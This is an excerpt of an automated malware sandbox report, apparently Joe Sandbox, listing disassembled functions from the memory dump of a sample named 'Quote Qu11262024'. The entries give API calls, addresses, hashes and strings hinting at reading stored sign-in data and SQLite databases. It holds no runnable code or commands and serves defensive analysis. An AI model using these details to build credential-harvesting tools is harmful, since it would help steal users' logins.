                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                    • String ID: strings
                                                                                                    • API String ID: 3166385802-3030018805
                                                                                                    • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                    • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                    • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00411AF6
                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                    • wcsrchr.MSVCRT ref: 00411B14
                                                                                                    • wcscat.MSVCRT ref: 00411B2E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                    • String ID: AE$.cfg$General$EA
                                                                                                    • API String ID: 776488737-1622828088
                                                                                                    • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                    • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                    • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 0040D8BD
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                    • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                    • memset.MSVCRT ref: 0040D906
                                                                                                    • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                    • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                      • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                      • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 1028950076-4169760276
                                                                                                    • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                    • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                    • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                    • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                    • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                    • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                    • memset.MSVCRT ref: 0041BA3D
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: -journal$-wal
                                                                                                    • API String ID: 438689982-2894717839
                                                                                                    • Opcode ID: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                    • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                    • Opcode Fuzzy Hash: 441d401f2ecb898c8727535c1be97301f1c9a11951b4995e9674cbf0a45d1870
                                                                                                    • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                    • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                      • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                      • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                    • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Item$Dialog$MessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 3975816621-0
                                                                                                    • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                    • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                    • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                    APIs
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                    • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                      • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                      • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                    • String ID: .save$http://$https://$log profile$signIn
                                                                                                    • API String ID: 1214746602-2708368587
                                                                                                    • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                    • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                    • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                    APIs
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                    • memset.MSVCRT ref: 00405E33
                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                    • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                    • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                    • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313361498-0
                                                                                                    • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                    • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                    • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                    • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                    • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                      • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                    • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                    • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                    • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ItemMessageRectSend$Client
                                                                                                    • String ID:
                                                                                                    • API String ID: 2047574939-0
                                                                                                    • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                    • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                    • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                    APIs
                                                                                                    • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                    • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                    • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                    • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                    • String ID:
                                                                                                    • API String ID: 4218492932-0
                                                                                                    • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                    • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                    • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                    APIs
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                      • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                      • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                    • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                    • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                      • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                    • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                    • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy$memset
                                                                                                    • String ID: gj
                                                                                                    • API String ID: 438689982-4203073231
                                                                                                    • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                    • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                    • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                    APIs
                                                                                                    • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                    • API String ID: 3510742995-2446657581
                                                                                                    • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                    • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                    • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                    • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                    • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                    • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                    • memset.MSVCRT ref: 00405ABB
                                                                                                    • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                    • SetFocus.USER32(?), ref: 00405B76
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                    • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                    • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _snwprintfwcscat
                                                                                                    • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                    • API String ID: 384018552-4153097237
                                                                                                    • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                    • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                    • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2029023288-3849865405
                                                                                                    • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                    • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                    • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                    APIs
                                                                                                      • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                    • memset.MSVCRT ref: 00405455
                                                                                                    • memset.MSVCRT ref: 0040546C
                                                                                                    • memset.MSVCRT ref: 00405483
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memset$memcpy$ErrorLast
                                                                                                    • String ID: 6$\
                                                                                                    • API String ID: 404372293-1284684873
                                                                                                    • Opcode ID: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                    • Opcode Fuzzy Hash: 0330b9b22cd30b5b2625a0a7e6ceceae146d238a8b356c7611763844912e7754
                                                                                                    • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                    APIs
                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                    • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                    • wcscat.MSVCRT ref: 0040A0E6
                                                                                                    • wcscat.MSVCRT ref: 0040A0F5
                                                                                                    • wcscpy.MSVCRT ref: 0040A107
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.2630485765.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_400000_Quote Qu11262024.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                    • String ID:
                                                                                                    • API String ID: 1331804452-0
                                                                                                    • Opcode ID: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                    • Opcode Fuzzy Hash: 23c89843948f9d4d6ccb23a927c15bd8e6af065920e5565f2ade9cfd678fbabf
                                                                                                    • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
